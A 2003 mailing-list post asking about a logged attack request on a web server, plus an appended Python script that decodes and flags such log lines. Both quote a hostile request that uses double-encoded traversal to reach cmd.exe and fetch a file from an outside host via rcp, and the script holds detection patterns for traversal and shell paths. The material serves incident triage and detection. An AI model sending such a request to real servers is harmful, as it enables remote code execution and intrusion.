Security Incidents
mailing list archives
smsx.exe?
From: Steve Bromwich <incident () fop ns ca>
Date: Mon, 5 May 2003 14:29:53 -0300 (ADT)
Hi,
Has anyone seen a request like this in their logs?
205.247.193.56 - - [05/May/2003:11:59:52 -0300]
"/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+rcp+-b+195.92.252.138.adm:smsx.exe+."
I tried rcping smsx.exe off the remote site but no joy; is the .adm an
obscure windows-specific port address or something? One of our windows
guys said the smsx was "remote management software", but had no idea about
the .adm...
On a side note, the response I got from energis (the 195.92.252.138 owner)
had the following at the start:
PLEASE NOTE WE ARE CURRENTLY DEALING WITH A 2 WEEK BACKLOG
Further down:
Please note that if one of our IP addresses looks up to a 'webcache' (as
opposed to a modem) we have a *maximum* of 30 hours to trace the user
responsible for the abuse.
So I guess this means that Energis users have a pretty good chance of
abusing remote servers through Energis' web cache and getting away with it
:-/
Cheers, Steve
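
Added example, not part of the original post: a small Python triage script that decodes the request target from a log line like the one quoted above until it stops changing, then flags multi-layer encoding, directory traversal and a command-interpreter path. The function names, regexes and the second (benign) log line are assumptions made for illustration; the first sample line is the request from the post joined onto one line.

```python
import re
from urllib.parse import unquote

# Constructed sample input: the request quoted in the post (joined onto one
# line) and one benign request using a documentation-range address.
SAMPLE_LOG = [
    '205.247.193.56 - - [05/May/2003:11:59:52 -0300] '
    '"/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+rcp+-b+195.92.252.138.adm:smsx.exe+."',
    '192.0.2.10 - - [05/May/2003:12:01:07 -0300] "/index.html"',
]

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)"')
TRAVERSAL_RE = re.compile(r'\.\.[\\/]')                 # ../ or ..\ after decoding
SHELL_RE = re.compile(r'(cmd|command)\.(exe|com)', re.I)

def fully_decode(text, max_rounds=5):
    """Percent-decode repeatedly; return (decoded text, rounds that changed it)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(text)
        if decoded == text:
            break
        text, rounds = decoded, rounds + 1
    return text, rounds

def inspect(line):
    """Return a dict describing one log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, when, request = m.groups()
    # Tolerate both '"/path"' and '"GET /path HTTP/1.0"' request fields.
    target = next((p for p in request.split() if p.startswith('/')), request)
    path, _, query = target.partition('?')
    decoded_path, rounds = fully_decode(path)
    findings = []
    if rounds > 1:
        findings.append('multi-encoded')    # e.g. %255c -> %5c -> backslash
    if TRAVERSAL_RE.search(decoded_path):
        findings.append('traversal')
    if SHELL_RE.search(decoded_path):
        findings.append('shell')
    command = fully_decode(query.replace('+', ' '))[0]
    return {'client': client, 'time': when, 'path': decoded_path,
            'command': command, 'findings': findings}

if __name__ == '__main__':
    for entry in SAMPLE_LOG:
        print(inspect(entry))
```

A line that needs more than one decoding round before it settles is worth flagging on its own, since ordinary clients have no reason to encode a percent sign in front of a path separator.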